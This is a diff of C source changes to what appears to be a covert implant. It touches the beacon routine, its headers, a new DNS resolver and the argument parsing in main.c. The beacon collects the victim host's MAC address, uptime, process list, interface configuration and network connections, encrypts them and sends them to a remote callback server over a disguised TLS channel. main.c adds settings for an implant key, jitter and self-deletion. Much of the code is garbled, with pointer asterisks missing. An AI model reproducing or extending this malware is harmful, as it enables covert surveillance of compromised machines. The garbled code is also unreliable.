500		-	memcpy(ptr,(unsigned char*)&ipconfig_hdr, sizeof(ipconfig_hdr));
	402	+	if (ipconfig_data != NULL) {
	403	+	memcpy(ptr, (unsigned char *) &ipconfig_hdr, sizeof(ipconfig_hdr));
501	404		ptr += sizeof(ADD_HDR);
502	405		//copy in ipconfig data
503		-	memcpy(ptr,ipconfig_data, ipconfig_len);
	406	+	memcpy(ptr, ipconfig_data, ipconfig_len);
504	407		ptr += ipconfig_len;
505	408		}
506	409		//copy in netstat hdr
507		-	if(netstat_rn_data != NULL)
508		-	{
509		-	memcpy(ptr,(unsigned char*)&netstat_rn_hdr, sizeof(netstat_rn_hdr));
	410	+	if (netstat_rn_data != NULL) {
	411	+	memcpy(ptr, (unsigned char *) &netstat_rn_hdr, sizeof(netstat_rn_hdr));
510	412		ptr += sizeof(ADD_HDR);
511	413		//copy in netstat data
512		-	memcpy(ptr,netstat_rn_data,netstat_rn_len);
	414	+	memcpy(ptr, netstat_rn_data, netstat_rn_len);
513	415		ptr += netstat_rn_len;
514	416		}
515		-
516	417		//copy in netstat hdr
517		-	if(netstat_an_data != NULL)
518		-	{
519		-	memcpy(ptr,(unsigned char*)&netstat_an_hdr, sizeof(netstat_an_hdr));
	418	+	if (netstat_an_data != NULL) {
	419	+	memcpy(ptr, (unsigned char *) &netstat_an_hdr, sizeof(netstat_an_hdr));
520	420		ptr += sizeof(ADD_HDR);
521	421		//copy in netstat data
522		-	memcpy(ptr,netstat_an_data,netstat_an_len);
	422	+	memcpy(ptr, netstat_an_data, netstat_an_len);
523	423		ptr += netstat_an_len;
524	424		}
525		-
526	425		//add closing header
527		-	memcpy(ptr, (unsigned char*)&end_hdr, sizeof(end_hdr));
	426	+	memcpy(ptr, (unsigned char *) &end_hdr, sizeof(end_hdr));
528	427
529	428		ptr = NULL;
530	429
531	430		//compress packet
532		-	compressed_packet = compress_packet(packet,packetSize,&compressedPacketSize);
	431	+	compressed_packet = compress_packet(packet, packetSize, &compressedPacketSize);
533	432		DLX(5, printf("Original packet size: %d, Compressed packet size: %d\n", packetSize, compressedPacketSize));
534	433		//combine compressed_packet with beacon header.
535		-	if(packet != NULL)
536		-	{
537		-	free(packet);
538		-	}
	434	+
	435	+	Free(packet);
	436	+
539	437
540	438		packetSize = sizeof(BEACON_HDR) + compressedPacketSize;
541		-	packet = (unsigned char*)malloc(packetSize);
542		-	if(packet == NULL)
543		-	{
	439	+	packet = (unsigned char *) malloc(packetSize);
	440	+	if (packet == NULL) {
544	441		goto EXIT;
545	442		}
546	443
547		-	//zero out buffer
548		-	memset(packet, 0, packetSize);
549		-	//copy in beacon hdr
550		-	memcpy(packet, &bhdr, sizeof(BEACON_HDR));
551		-	//copy in compressed data
552		-	memcpy(packet+sizeof(BEACON_HDR), compressed_packet, compressedPacketSize);
553		-
554		-	//calculate encryption buffer size
555		-	encrypt_size = packetSize + (8 - (packetSize % 8));
	444	+	memset(packet, 0, packetSize); // Zero out buffer
	445	+	memcpy(packet, &bhdr, sizeof(BEACON_HDR)); // Copy-in beacon header
	446	+	memcpy(packet + sizeof(BEACON_HDR), compressed_packet, compressedPacketSize); // Copy-in compressed data
	447	+	encrypt_size = packetSize + (8 - (packetSize % 8)); // Calculate encryption buffer size
556	448
557	449		//connect to the client
558		-	DLX(4, printf("Connecting to client %s on port %d using socket: %d\n", beaconInfo->ip, beaconInfo->port, sock));
559		-	retval = net_connect(&sock,beaconInfo->ip, beaconInfo->port);
560		-
561		-	if ( retval != SUCCESS )
562		-	{
563		-	DLX(1, printf("\tERROR: net_connect(): ");
564		-	if ( retval == POLARSSL_ERR_NET_CONNECT_FAILED )
565		-	{
566		-	printf( "NET_CONNECT_FAILED\n");
567		-	}
568		-	else if ( retval == POLARSSL_ERR_NET_SOCKET_FAILED )
569		-	{
570		-	printf( "NET_SOCKET_FAILED\n");
571		-	}
572		-	else if ( retval == POLARSSL_ERR_NET_UNKNOWN_HOST )
573		-	{
574		-	printf( "NET_UNKNOWN_HOST\n");
575		-	}
	450	+	DLX(4, printf("\tAttempting connection to client %s on port %d...\n", beaconInfo->ip, beaconInfo->port));
	451	+	retval = net_connect(&sock, beaconInfo->ip, beaconInfo->port);
	452	+	if (retval != SUCCESS) {
	453	+	DLX(1, printf("\tERROR: net_connect(): "); if (retval == POLARSSL_ERR_NET_CONNECT_FAILED) {
	454	+	printf("NET_CONNECT_FAILED\n");}
	455	+	else
	456	+	if (retval == POLARSSL_ERR_NET_SOCKET_FAILED) {
	457	+	printf("NET_SOCKET_FAILED\n");}
576	458		else
577		-	{
578		-	printf( "Unknown error\n");
579		-	}
	459	+	if (retval == POLARSSL_ERR_NET_UNKNOWN_HOST) {
	460	+	printf("NET_UNKNOWN_HOST\n");}
	461	+	else {
	462	+	printf("Unknown error\n");}
580	463		);
581	464
582	465		// we can return from here. no need to goto to bottom of function because
583	466		// at this stage, there is nothing to clean-up
584		-	//return FAILURE;
585		-	//Don't think that is true you have allocated all of your beacon info
586		-	//however it just couldnt connect out lets clean up
	467	+	// return FAILURE;
	468	+	// Don't think that is true you have allocated all of your beacon info
	469	+	// however it just couldn't connect out; lets clean up.
587	470		retval = FAILURE;
588	471		goto EXIT;
589	472		}
590		-
591	473		//setup ssl
592		-	DLX(4, printf("\tSetup crypto\n"));
593		-	if ((beacon_io = crypt_setup_client(&sock)) == NULL)
594		-	{
	474	+	DLX(4, printf("\tConnection successful, setup crypto\n"));
	475	+	if ((beacon_io = crypt_setup_client(&sock)) == NULL) {
595	476		DLX(4, printf("\tERROR: crypt_setup_client()\n"));
596	477		retval = FAILURE;
597	478		goto EXIT;
598	479		}
599		-
600	480		//set swindle flag to true
601	481		beacon_io->ssl->use_custom = 1;
602	482		beacon_io->ssl->tool_id = TOOL_ID;
		skipped 1 lines
604	484
605	485		//perform an SSL handshake
606	486		DLX(4, printf("\tPerform SSL handshake\n"));
607		-	if (crypt_handshake(beacon_io) != SUCCESS)
608		-	{
	487	+	if (crypt_handshake(beacon_io) != SUCCESS) {
609	488		DLX(2, printf("\tERROR: SSL connection with SSL server failed to initialize.\n"));
610		-	retval = FAILURE;
	489	+	retval = FAILURE;
611	490		goto EXIT;
612	491		}
613	492
614	493		DLX(4, printf("\tHandshake Complete!\n"));
615	494
616		-	//turn off the ssl encryption since we use our own
617		-	beacon_io->ssl->do_crypt = 0;
	495	+	beacon_io->ssl->do_crypt = 0; //turn off the ssl encryption since we use our own
	496	+	generate_random_bytes(randData, 64); //generate 32 random bytes
	497	+	embedSize(encrypt_size, randData); //embed the data size so the server knows how much data to read
618	498
619		-	//generate 32 random bytes
620		-	generate_random_bytes(randData,64);
621		-
622		-	//embed the data size so the server knows how much data to read
623		-	embedSize(encrypt_size,randData);
624	499		DLX(4, printf("\tEncrypt_size is %d \n", encrypt_size));
625		-
626		-	DLX(4, printf( "\tSending the first 64 bytes with data size encoded in random data\n"));
	500	+	DLX(4, printf("\tSending the first 64 bytes with data size encoded in random data\n"));
627	501		//send the bytes
628		-	if (crypt_write(beacon_io, randData, 64) < 0)
629		-	{ //TODO: this is probably no the best check... maybe 32 > cryptwrite
	502	+	if (crypt_write(beacon_io, randData, 64) < 0) { //TODO: this is probably no the best check... maybe 32 > crypt_write
630	503		retval = FAILURE;
631	504		goto EXIT;
632	505		}
633		-
634	506		//receive the buffer
635	507		memset(randData, 0, 64);
636		-
637		-	retval = recv(sock,(char*)randData,37,0);
638		-	if (retval < 0)
639		-	{
640		-	DLX(4, printf( "\tReceive failed:"));
	508	+	retval = recv(sock, (char *) randData, 37, 0);
	509	+	if (retval < 0) {
	510	+	DLX(4, printf("\tReceive failed:"));
641	511		perror("1");
642	512		retval = FAILURE;
643	513		goto EXIT;
644	514		}
645		-	DLX(4, printf( "\tReceived %d bytes\n", retval));
	515	+	DLX(4, printf("\tReceived %d bytes\n", retval));
646	516
647		-	//extract the key
648		-	extract_key(randData + 5,key);
	517	+	extract_key(randData + 5, key); //extract the key
649	518
650	519		//encrypt the beacon data with the extracted key
651	520		//the buffer is padded so that it can be broken
652	521		//up into 8 byte chunks
653		-	enc_buf = (unsigned char*) malloc(encrypt_size);
654		-	if(enc_buf == NULL)
655		-	{
	522	+	enc_buf = (unsigned char *) malloc(encrypt_size);
	523	+	if (enc_buf == NULL) {
656	524		DLX(1, printf("Could not allocate space for enc_buf"));
657	525		goto EXIT;
658	526		}
659		-	memset(enc_buf, 0 , encrypt_size);
660		-
661		-	encrypt_data(packet,packetSize,enc_buf,key);
	527	+	memset(enc_buf, 0, encrypt_size);
	528	+	encrypt_data(packet, packetSize, enc_buf, key);
662	529
663		-	//send the data
664		-	//while we haven't sent all data keep going
665		-	//send size embedded in rand data
666		-	//send encrypted data
	530	+	// Send the data until all data has been sent
	531	+	// Size embedded in random data
	532	+	// Send encrypted data
667	533		do {
668	534
669		-	//embed the data size so the server knows how much data to read
	535	+	// Embed the data size so the server knows how much data to read
670	536		sz_to_send = (encrypt_size - bytes_sent) >= MAX_SSL_PACKET_SIZE ? MAX_SSL_PACKET_SIZE : encrypt_size - bytes_sent;
671		-	DLX(4, printf("\tSending: %d bytes\n", sz_to_send));
	537	+	DLX(6, printf("\tSending: %d bytes\n", sz_to_send));
672	538
673	539		retval = crypt_write(beacon_io, enc_buf + bytes_sent, sz_to_send);
674		-	if( retval < 0) {
675		-	DLX(4, printf("crypt_write() failed: "); print_ssl_error(retval));
	540	+	if (retval < 0) {
	541	+	DLX(4, printf("crypt_write() failed: ");
	542	+	print_ssl_error(retval));
676	543		retval = FAILURE;
677	544		goto EXIT;
678	545		}
679	546
680	547		// Receive ACK
681	548		memset(recv_buf, 0, 30);
682		-
683	549		retval = recv(sock, recv_buf, 30, 0);
684		-	if (retval < 0)
685		-	{
686		-	DLX(4, printf( "\tReceive failed:"));
	550	+	if (retval < 0) {
	551	+	DLX(4, printf("\tReceive failed:"));
687	552		perror("2");
688	553		retval = FAILURE;
689	554		goto EXIT;
690	555		}
691		-	DLX(4, printf( "\tReceived %d bytes\n", retval));
	556	+	if (retval == 0) {
	557	+	DLX(6, printf("\tPeer closed connection\n")); // Not sure if this should be success or failure
	558	+	break;
	559	+	}
	560	+	DLX(6, printf("\tReceived %d bytes\n", retval));
	561	+	DPB(7, "Received buffer: ", (const unsigned char *)recv_buf, retval);
	562	+	DPB(7, "Received data: ", (const unsigned char *)(recv_buf + sizeof(SSL_HDR)), retval - (sizeof(SSL_HDR) ));
692	563
693		-	recv_sz = atoi(recv_buf + (sizeof(SSL_HDR) - 1));
694		-	DLX(4, printf("\tACKed bytes: %d\n", recv_sz));
	564	+	recv_sz = atoi(recv_buf + (sizeof(SSL_HDR)));
	565	+	DLX(6, printf("\tACKed bytes: %d\n", recv_sz));
695	566		bytes_sent += recv_sz;
696		-	DLX(4, printf("\tTotal bytes sent: %d, %d to go\n", bytes_sent, encrypt_size-bytes_sent));
	567	+	DLX(6, printf("\tTotal bytes sent: %d, %d to go\n", bytes_sent, encrypt_size - bytes_sent));
697	568		} while (bytes_sent < encrypt_size);
698	569
699	570		retval = SUCCESS;
700	571		DLX(4, printf("BEACON SENT cleaning up\n"));
701	572
702		-	EXIT:
703		-	//cleanup
	573	+	EXIT: // cleanup
704	574
705	575		if (beacon_io)
706		-	if (beacon_io->ssl->major_ver >= 1 ) {
	576	+	if (beacon_io->ssl->major_ver >= 1) {
707	577		crypt_close_notify(beacon_io);
708	578		crypt_cleanup(beacon_io);
709	579		}
710	580
711		-	if(mac_data != NULL)
712		-	{
713		-	free(mac_data);
714		-	}
715		-
716		-	if(uptime_data != NULL)
717		-	{
718		-	free(uptime_data);
719		-	}
720		-
721		-	if(next_beacon_data != NULL)
722		-	{
723		-	free(next_beacon_data);
724		-	}
725		-
726		-	if(proc_list_data != NULL)
727		-	{
728		-	release_process_list(proc_list_data);
729		-	}
730		-
731		-	if(ipconfig_data != NULL)
732		-	{
733		-	release_ifconfig(ipconfig_data);
734		-	}
735		-
736		-	if(netstat_rn_data != NULL)
737		-	{
738		-	release_netstat_rn(netstat_rn_data);
739		-	}
740		-
741		-	if(netstat_an_data != NULL)
742		-	{
743		-	release_netstat_an(netstat_an_data);
744		-	}
745		-
746		-	if(enc_buf != NULL)
747		-	{
748		-	free(enc_buf);
749		-	}
750		-
751		-	if(packet != NULL)
752		-	{
753		-	free(packet);
754		-	}
	581	+	Free(mac_data);
	582	+	Free(uptime_data);
	583	+	Free(next_beacon_data);
	584	+	Free(proc_list_data);
	585	+	Free(ipconfig_data);
	586	+	Free(netstat_rn_data);
	587	+	Free(netstat_an_data);
	588	+	Free(enc_buf);
	589	+	Free(packet);
	590	+	Free(compressed_packet);
755	591
756		-	if(compressed_packet != NULL)
757		-	{
758		-	release_compressed_packet(compressed_packet);
759		-	}
760		-
761		-	if ( sock > 0 ) net_close( sock );
	592	+	if (sock > 0)
	593	+	net_close(sock);
762	594
763	595		return retval;
764	596		}
765	597
766	598		//******************************************************************
767	599
768		-	void encrypt_data(unsigned char* src, int src_size, unsigned char* dest, unsigned char* key)
	600	+	void encrypt_data(unsigned char src, int src_size, unsigned char dest, unsigned char *key)
769	601		{
770	602		xtea_context xtea;
771		-	int i,x;
772		-	unsigned char* src_ptr;
773		-	unsigned char* dest_ptr;
	603	+	int i, x;
	604	+	unsigned char *src_ptr;
	605	+	unsigned char *dest_ptr;
774	606		unsigned char enc[8];
775	607		unsigned char buf[8];
776	608
777	609		//initialize the xtea encryption context
778		-	xtea_setup(&xtea,key);
	610	+	xtea_setup(&xtea, key);
779	611
780	612		i = 0;
781	613
782		-	while(i < src_size)
783		-	{
	614	+	while (i < src_size) {
784	615		src_ptr = src + i;
785		-	dest_ptr = dest +i;
786		-	if( (src_size - i) < 8)
787		-	{
788		-	for(x = 0; x < (src_size - i); ++x)
789		-	{
	616	+	dest_ptr = dest + i;
	617	+	if ((src_size - i) < 8) {
	618	+	for (x = 0; x < (src_size - i); ++x) {
790	619		buf[x] = src_ptr[x];
791	620		}
792		-	memset(buf + (src_size - i), 0, (8 - (src_size-i)) );
793		-	}
794		-	else
795		-	{
796		-	for(x = 0; x < 8; ++x)
797		-	{
	621	+	memset(buf + (src_size - i), 0, (8 - (src_size - i)));
	622	+	} else {
	623	+	for (x = 0; x < 8; ++x) {
798	624		buf[x] = src_ptr[x];
799	625		}
800	626		}
801	627
802		-	xtea_crypt_ecb(&xtea,XTEA_ENCRYPT,buf,enc);
	628	+	xtea_crypt_ecb(&xtea, XTEA_ENCRYPT, buf, enc);
803	629
804		-	memcpy(dest_ptr,enc,8);
	630	+	memcpy(dest_ptr, enc, 8);
805	631		i += 8;
806	632		}
807	633		}
808	634
809	635
810	636		//******************************************************************
811		-	int get_printable_mac(unsigned char* dest, unsigned char* src)
	637	+	int get_printable_mac(unsigned char dest, unsigned char src)
812	638		{
813	639		char buffer[18];
814		-	memset(buffer,0,18);
	640	+	memset(buffer, 0, 18);
815	641
816		-	sprintf(buffer,"%.2x-%.2x-%.2x-%.2x-%.2x-%.2x",
817		-	src[0],
818		-	src[1],
819		-	src[2],
820		-	src[3],
821		-	src[4],
822		-	src[5]);
	642	+	sprintf(buffer, "%.2x-%.2x-%.2x-%.2x-%.2x-%.2x", src[0], src[1], src[2], src[3], src[4], src[5]);
823	643
824		-	memcpy(dest,buffer,18);
	644	+	memcpy(dest, buffer, 18);
825	645		return 0;
826	646		}
827	647
828	648		//******************************************************************
829		-	void extract_key(unsigned char* buf, unsigned char* key)
	649	+	void extract_key(unsigned char buf, unsigned char key)
830	650		{
831	651		int offset;
832	652
		skipped 7 lines

■ ■ ■ ■ ■ ■

server/beacon.h

		skipped 3 lines
4	4		#include "function_strings.h"
5	5		#include "compat.h"
6	6
	7	+	#define BEACON_HEADER_VERSION 29
	8	+
7	9		#define MAC_ADDR_LEN 6
8	10		#define MAC_ADDR_LEN_FORMATTED 18
9	11		#define MAX_SSL_PACKET_SIZE 4052
10	12		#define TOOL_ID 0x65ae82c7
11	13		#define TOOL_ID_XOR_KEY 3
12	14		#define XOR_KEY 5
13		-	#define DEFAULT_BEACON_PORT 443 // HTTPS
	15	+	#define DEFAULT_BEACON_PORT 443 // HTTPS
14	16
15	17		//Flag defines
16	18		// OS
	19	+	#define BH_UNDEFINED 0
17	20		#define BH_WINDOWS 10 // No longer supported
18	21		#define BH_LINUX_X86 20
19	22		#define BH_LINUX_X86_64 21
		skipped 24 lines
44	47		*
45	48		* @var ip - Contains the ip address to beacon back to
46	49		* @var port - Contains the port number to beacon back on
	50	+	* @var dnsIP - IP address(es) of DNS server(s)
47	51		* @var macAddr - Contains the host's primary MAC address
48	52		* @var initDelay - Time to wait before initial beacon
49	53		* @var interval - Time to wait in between beacons
	54	+	* @var percentVariance - variance to apply to interval
50	55		*/
51	56
52		-	typedef struct __attribute__((packed)) _BEACON_INFO
53		-	{
54		-	char *ip;
	57	+	typedef struct __attribute__ ((packed)) _BEACON_INFO {
	58	+	char *host; // Domain name or IP address of beacon server
	59	+	char *ip; // Resolved IP address of beacon server
55	60		int port;
	61	+	char dns[2][16]; // Array of up to two DNS server addresses
56	62		unsigned char macAddr[MAC_ADDR_LEN];
57		-	int initDelay;
58		-	int interval;
59		-	float percentVariance;
	63	+	unsigned long initDelay; // Initial beacon delay (seconds)
	64	+	int interval; // Beacon interval (seconds)
	65	+	float percentVariance; // Variance in beacon interval in percent (0-100);
60	66		} BEACONINFO;
61	67
62		-
63		-	typedef struct __attribute__((packed)) beacon_field
64		-	{
65		-	unsigned char mac[20];
66		-	unsigned long uptime;
67		-	unsigned long tool_id;
68		-	} BEACONFIELD;
69		-
70		-
71		-	typedef struct __attribute__((packed)) beacon_header
72		-	{
	68	+	typedef struct __attribute__ ((packed)) beacon_header {
73	69		unsigned short version;
74	70		unsigned short os;
75	71		} BEACON_HDR;
76	72
77		-	typedef struct __attribute__((packed)) add_header
78		-	{
	73	+	typedef struct __attribute__ ((packed)) add_header {
79	74		unsigned short type;
80	75		unsigned short length;
81		-	}ADD_HDR;
	76	+	} ADD_HDR;
82	77
83		-	typedef struct __attribute__((packed)) ssl_hdr
84		-	{
	78	+	typedef struct __attribute__ ((packed)) ssl_hdr {
85	79		unsigned char type;
86	80		unsigned short version;
87	81		unsigned short length;
88		-	}SSL_HDR;
	82	+	} SSL_HDR;
89	83
90	84		/*!
91	85		* @brief Beacon
		skipped 23 lines
115	109		* the function succeeded.
116	110		*/
117	111
118		-	int beacon_start( char *beaconIP, int beaconPort, unsigned long initialDelay, int interval, float jitter );
	112	+	int beacon_start(BEACONINFO *beaconInfo);
119	113		int calc_jitter(int baseTime, float jitterPercent);
120		-	#endif //__BEACON_H
	114	+	#endif //__BEACON_H
121	115

■ ■ ■ ■ ■ ■

server/dns_client.c

1	+	#include <sys/types.h>
2	+	#include <sys/socket.h>
3	+	#include <arpa/inet.h>
4	+	#include <netinet/in.h>
5	+	#include <signal.h>
6	+	#include <string.h>
7	+	#include <stdio.h>
8	+	#include <stdlib.h>
9	+	#include <string.h>
10	+	#include <unistd.h>
11	+	#include "dns_protocol.h"
12	+	#include "decode_dns.h"
13	+	#include "debug.h"
14	+
15	+	enum {WAITING = 0, TIMED_OUT = 1} response_timeout;
16	+
17	+	/*!
18	+	* @brief Perform DNS lookup
19	+	*
20	+	* See RFC 1035 section 4 for DNS message details.
21	+	*
22	+	* @param ip - IP address or domain name of host
23	+	* @param serverIP - DNS server IP address (e.g. "192.168.1.53")
24	+	* @returns a pointer to the dotted quad address string (malloc'd memory that must be freed)
25	+	*/
26	+	char dns_resolv(char ip, char *serverIP)
27	+	{
28	+	uint8_t buf[MAX_MSG_LENGTH] = {0};
29	+	DNS_header *header;
30	+	DNS_response *response;
31	+
32	+	struct sockaddr_in sin;
33	+	int sin_len = sizeof(sin);
34	+	int sock;
35	+
36	+	struct sigaction response_timer;
37	+	void *qp;
38	+	size_t buflen = 0;
39	+	char *p;
40	+	int n;
41	+	uint16_t queryID = 0;
42	+
43	+	DLX(5,printf("Attempting to resolve %s\n", ip));
44	+	if ((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
45	+	DLX(4, perror("Could not create socket"));
46	+	return NULL;
47	+	}
48	+	memset((char *) &sin, 0, sizeof(sin));
49	+	sin.sin_family = AF_INET;
50	+	sin.sin_port = htons(53); // DNS UDP port number
51	+	inet_aton(serverIP, &sin.sin_addr); // DNS server address
52	+
53	+	header = (DNS_header *)buf;
54	+	queryID = htons((uint16_t)rand());
55	+	header->id = htons(queryID);
56	+	header->qdcount = htons(1);
57	+
58	+	// Generate the query
59	+	{
60	+	char *tbuf; // Pointer to temporary buffer for parsing domain name
61	+	D(char *x;)
62	+
63	+	if ((tbuf = calloc(strlen(ip)+1, 1)) == NULL) // Create temporary buffer
64	+	return NULL;
65	+
66	+	memcpy(tbuf, ip, strlen(ip));
67	+	qp = (char *) (buf + sizeof(DNS_header)); // Skip over header and build DNS formatted name
68	+	D(x = qp;)
69	+	p = strtok(tbuf, "."); // p points to first part of name
70	+	while (p) {
71	+	((uint8_t )qp++) = (uint8_t)strlen(p); // Add length encoding
72	+	memcpy((char *)qp, p, strlen(p)); // Copy portion of name
73	+	qp += strlen(p); // Reposition pointer to next part of name
74	+	p = strtok(NULL, "."); // Repeat until entire domain name encoded
75	+	}
76	+	(char )qp++ = '\0'; // Null byte terminates Qname field
77	+	DLX(5, printf("Query Buffer: %s\n", x));
78	+	(uint16_t )qp = htons(1), qp += 2; // Qtype = 1 (A record)
79	+	(uint16_t )qp++ = htons(1), qp += 2; // Qclass = 1 (IN ==> INTERNET)
80	+	free(tbuf);
81	+	}
82	+	// Send DNS query
83	+	DLX(5,printf("Sending DNS query...\n"));
84	+	buflen = (size_t)qp - (size_t)buf;
85	+	n = sendto(sock, buf, buflen, 0, (struct sockaddr *) &sin, sin_len);
86	+	if (n < 0) {
87	+	DLX(4, perror("Could not send DNS query"));
88	+	return NULL;
89	+	}
90	+
91	+	//*************************************************************************************************
92	+
93	+	// Wait for DNS server response
94	+	response_timer.sa_handler = timeout_handler;
95	+	if ((sigaction(SIGALRM, &response_timer, NULL)) != 0) {
96	+	DLX(4, perror("Timeout setup"));
97	+	}
98	+	response_timeout = WAITING;
99	+	alarm(DNS_TIMEOUT);
100	+	response = (DNS_response *)buf;
101	+	DLX(4,printf("Waiting for response from DNS server...\n"));
102	+	do {
103	+	n = recv(sock, buf, MAX_MSG_LENGTH, 0);
104	+	if (n < 0) {
105	+	DLX(4, perror("Error receiving DNS response"));
106	+	return NULL;
107	+	}
108	+	if (n < (int)sizeof(DNS_header)) // Must at least see a DNS-sized header
109	+	DLX(4, printf("Packet received is %i bytes -- too small for a DNS response\n", n));
110	+	continue;
111	+	header = (DNS_header *)buf;
112	+	} while (ntohs(header->id) != queryID && !header->qr && response_timeout == WAITING); // QR must be set and the header ID must match the queryID
113	+	alarm(0); // Kill timer
114	+
115	+	if (response_timeout == TIMED_OUT) {
116	+	DLX(4, printf("No response from DNS server\n"));
117	+	return NULL;
118	+	}
119	+
120	+	if (header->ancount == 0) {
121	+	DLX(4, printf("%s did not resolve\n", ip));
122	+	return NULL;
123	+	}
124	+
125	+	#if 0
126	+	response = (DNS_response *)(buf + sizeof(DNS_header));
127	+	DPB(6, "DNS response: ", response, n - sizeof(DNS_header));
128	+	DLX(4, printf("RR Type: %d\n", ntohs(response->type)));
129	+	if (ntohs(response->type) != A_RECORD) {
130	+	DLX(4, printf("Response was not an A record.\n"));
131	+	return NULL;
132	+	}
133	+
134	+	if ((resolved_ip = (char *)malloc(16)) == NULL) {
135	+	DLX(4, printf("Failed to malloc resolved IP buffer.\n"));
136	+	return NULL;
137	+	}
138	+	// Convert decimal IP address back to a character string
139	+	if ((inet_ntop(AF_INET, response->rdata, resolved_ip, 16)) == NULL) {
140	+	DLX(4, printf("inet_ntop() failed to convert IP to string.\n"));
141	+	return NULL;
142	+	}
143	+
144	+	return resolved_ip; // Return IP address
145	+	#endif
146	+
147	+	return (decode_dns(response));
148	+	}
149	+
150	+	void timeout_handler(int signal)
151	+	{
152	+	if (signal == SIGALRM) {
153	+	DLX(4, printf("DNS lookup timed out.\n"));
154	+	response_timeout = TIMED_OUT;
155	+	}
156	+	}
157	+

■ ■ ■ ■ ■ ■

server/dns_protocol.h

1	+	#ifndef __DNS_PROTOCOL_H__
2	+	#define __DNS_PROTOCOL_H__
3	+
4	+	#include <sys/types.h>
5	+
6	+	#define MAX_MSG_LENGTH 512
7	+	#define DNS_TIMEOUT 30 // 30-second timeout
8	+
9	+	/* QR
10	+	* a one bit field that specifies whether this message is a query
11	+	* or a response
12	+	*/
13	+	#define QR_QUERY 0
14	+	#define QR_RESPONSE 1
15	+
16	+	/* OPCODE
17	+	* a four bit field that specifies kind of query in this message
18	+	*/
19	+	#define OPCODE_QUERY 0 /* a standard query */
20	+	#define OPCODE_IQUERY 1 /* an inverse query */
21	+	#define OPCODE_STATUS 2 /* a server status request */
22	+	/* 3-15 reserved for future use */
23	+
24	+	/* AA
25	+	* one bit, valid in responses, and specifies that the responding
26	+	* name server is an authority for the domain name in question
27	+	* section
28	+	*/
29	+	#define AA_NONAUTHORITY 0
30	+	#define AA_AUTHORITY 1
31	+
32	+	typedef struct {
33	+	u_int16_t id; /* a 16 bit identifier assigned by the client */
34	+	u_int16_t qr:1;
35	+	u_int16_t opcode:4;
36	+	u_int16_t aa:1;
37	+	u_int16_t tc:1;
38	+	u_int16_t rd:1;
39	+	u_int16_t ra:1;
40	+	u_int16_t z:3;
41	+	u_int16_t rcode:4;
42	+	u_int16_t qdcount;
43	+	u_int16_t ancount;
44	+	u_int16_t nscount;
45	+	u_int16_t arcount;
46	+	} DNS_header;
47	+
48	+	#if 0
49	+	typedef struct {
50	+	DNS_header header;
51	+	union
52	+	// struct dns_question question;
53	+	char *data;
54	+	u_int16_t data_size;
55	+	} DNS_packet;
56	+	#endif
57	+
58	+	#define A_RECORD 1
59	+	typedef struct {
60	+	char *name;
61	+	u_int16_t type;
62	+	u_int16_t class;
63	+	u_int32_t ttl;
64	+	u_int16_t rdlength;
65	+	char *rdata;
66	+	} DNS_response;
67	+
68	+	typedef struct {
69	+	char *qname;
70	+	u_int16_t qtype;
71	+	u_int16_t qclass;
72	+	} DNS_query;
73	+
74	+	char dns_resolv(char ip, char *serverIP);
75	+	void timeout_handler(int signal);
76	+	#endif
77	+

■ ■ ■ ■ ■ ■

server/main.c

		skipped 23 lines
24	24		#include "polarssl/sha1.h"
25	25		#include "crypto.h"
26	26		#include "crypto_strings_main.h"
	27	+	#include "dns_protocol.h"
27	28		#ifdef LINUX
28	29		#include "getopt.h"
29	30		#endif
		skipped 16 lines
46	47		const char* ohshsmdlas3r = (char*) cIures4j;
47	48
48	49		// from polarssl/net.c
49		-	extern int wsa_init_done;
	50	+	//extern int wsa_init_done;
50	51
51	52		// Global
52	53		unsigned char ikey[ID_KEY_HASH_SIZE]; // Implant Key
		skipped 5 lines
58	59		#endif
59	60
60	61		//**************************************************************
61		-	struct cl_args
62		-	{
	62	+	// Patchable command line arguments
	63	+
	64	+	struct __attribute__ ((packed)) cl_args {
63	65		unsigned int sig;
64	66		unsigned int beacon_port;
65		-	unsigned int host_len;
66		-	char beacon_ip[256];
67		-	char iface[16];
68		-	unsigned char idKey[ID_KEY_HASH_SIZE];
	67	+	unsigned int trigger_delay;
69	68		unsigned long init_delay;
70	69		unsigned int interval;
71		-	unsigned int trigger_delay;
72	70		unsigned int jitter;
73	71		unsigned long delete_delay;
74		-	char sdpath[SD_PATH_LENGTH];
75		-	unsigned int patched;
	72	+	unsigned int patched; // Patched flag
	73	+	unsigned char idKey[ID_KEY_HASH_SIZE];
	74	+	char sdpath[SD_PATH_LENGTH]; // Path of self-delete control files
	75	+	char beacon_ip[256]; // Domain name or IP address of beacon server
	76	+	char dns[2][16]; // DNS server IP addresses (up to 2) in dotted quad format
76	77		};
77	78
78	79		#define SIG_HEAD 0x7AD8CFB6
79	80
80		-	struct cl_args args = { SIG_HEAD, 0, 0, {0}, {0}, {0}, 0, 0, 0, 0, 0, {0}, 0 };
	81	+	struct cl_args args = {SIG_HEAD, 443, 0, 0, 0, 0, 0, 0, {0}, {0}, {0}, {{0}} };
81	82
82	83		//**************************************************************
83	84		D (
		skipped 7 lines
91	92		printf("\t\t-k <id key> - implant key phrase\n");
92	93		printf("\t\t-K <id key> - implant key file\n");
93	94		printf("\t\t-j <jitter> - integer for percent jitter (0 <= jitter <= 30, default: 3 )\n");
94		-	#ifdef SOLARIS
95		-	printf("\t\t-I <interface> - interface on which to listen\n");
96		-	#endif
97	95		printf("\t\t-d <beacon delay> - initial beacon delay (in seconds, default: 2 minutes)\n");
98	96		printf("\t\t-t <callback delay> - delay between trigger received and callback +/- 30 seconds (in seconds)\n");
99	97		printf("\t\t-s <self-delete delay> - since last successful trigger/beacon (in seconds, default: 60 days)\n");
	98	+	printf("\t\t-S <IP address> - DNS server IP address in dotted quad notation (required if beacon address is a domain name)\n");
100	99		printf("\n\t\t-P <file path> - directory path for .config and .log files (120 chars max)\n");
101	100		#ifdef DEBUG
102	101		printf("\n\t\t-D <debug level> - debug level between 1 and 9, higher numbers are more verbose\n");
		skipped 8 lines
111	110		)
112	111
113	112		//**************************************************************
	113	+
114	114		static int is_elevated_permissions( void );
115	115		static void clean_args( int argc, char argv[], char new_argv0 );
116	116		static void * asloc( char *string );
117	117
118		-
	118	+	//**************************************************************
119	119
120		-	//**************************************************************
121	120		int main(int argc, char** argv)
122	121		{
123	122		int c = 0;
124		-	char *beaconIP = NULL;
125		-	char *szInterface = NULL;
126		-	int beaconPort = DEFAULT_BEACON_PORT;
127		-	unsigned long initialDelay = DEFAULT_INITIAL_DELAY;
